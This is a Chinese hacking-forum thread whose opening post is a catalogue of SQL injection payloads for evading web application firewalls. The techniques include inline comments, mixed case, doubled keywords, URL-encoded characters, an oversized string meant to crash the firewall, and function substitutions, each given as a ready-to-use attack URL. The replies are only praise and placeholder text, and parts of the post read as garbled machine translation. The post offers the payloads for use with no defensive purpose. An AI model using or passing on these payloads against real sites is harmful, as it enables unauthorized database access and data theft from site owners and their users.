加QQ81758415
快捷导航

[渗透测试] WAF从简单到复杂

[复制链接]
查看: 480|回复: 5

3万

主题

0

帖子

232

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
232
发表于 2019-5-21 23:39:41 | 显示全部楼层 |阅读模式
什么叫WAF?
Web运用防火墙是根据实行一连串对于HTTP/HTTPS的安全策略来专业为Web运用出示维护的这款商品。
WAF
基础/简易绕开方式:
1、注解符
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
2、应用大小写
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
3、融合前边二种方式
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….
4、关键词修改
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
此方式适用于某些会把union select修改掉的WAF,历经WAF过虑后就会变为 union select 1,2,3,4....
5、內部注解
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
U修改为%55,S修改为%53 在 union 和 select 中间加上注解/**/
高級绕开方式:
1、缓冲区溢出/使防火墙奔溃
绝大多数防火墙全是应用场景C/C++设计规划的,人们能够应用缓冲区溢出应用WAF奔溃
http://www.site.com/index.php?page_id=-15+and+(select1)=(Select 0xAA[._(add about 1000 "A")._])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
你能应用给出方式检测WAF
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
假如回到500不正确,我也能够应用缓冲区溢出的方式来绕开WAF
2、对数字开展编号
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
3、应用别的函数或是指令对引入句子开展修改
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws()
group_concat() | concat_ws()
4、运用WAF自身的作用绕开
倘若你发觉WAF会把"*"修改为空,那麼我也能够运用这一特点来开展绕开
‍‍‍‍‍‍‍‍http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....
其他方式:-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)‍


回复

使用道具 举报

0

主题

8

帖子

16

积分

新手上路

Rank: 1

积分
16
发表于 2019-5-21 23:42:29 | 显示全部楼层
{expression}
回复

使用道具 举报

0

主题

9

帖子

18

积分

新手上路

Rank: 1

积分
18
发表于 2019-5-22 05:31:09 | 显示全部楼层
太感动了,分享这么好的软件
回复

使用道具 举报

0

主题

9

帖子

18

积分

新手上路

Rank: 1

积分
18
发表于 2019-5-22 05:33:10 | 显示全部楼层
支持楼主,也支持黑客联盟
回复

使用道具 举报

0

主题

7

帖子

14

积分

新手上路

Rank: 1

积分
14
发表于 2019-5-22 06:41:53 | 显示全部楼层
支持黑客论坛啦论坛哈哈!
回复

使用道具 举报

0

主题

8

帖子

16

积分

新手上路

Rank: 1

积分
16
发表于 2019-5-22 08:03:11 | 显示全部楼层
{expression}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

精彩推荐

让创业更简单

  • 反馈建议:hackhl@outlook.com
  • 客服电话:暂时没有
  • 工作时间:周一到周五9点~22点

云服务支持

黑客联盟,快速搜索

关注我们

Copyright 黑客联盟安全防护网  Powered by©  技术支持:    ( 闽ICP备18000419号-1 )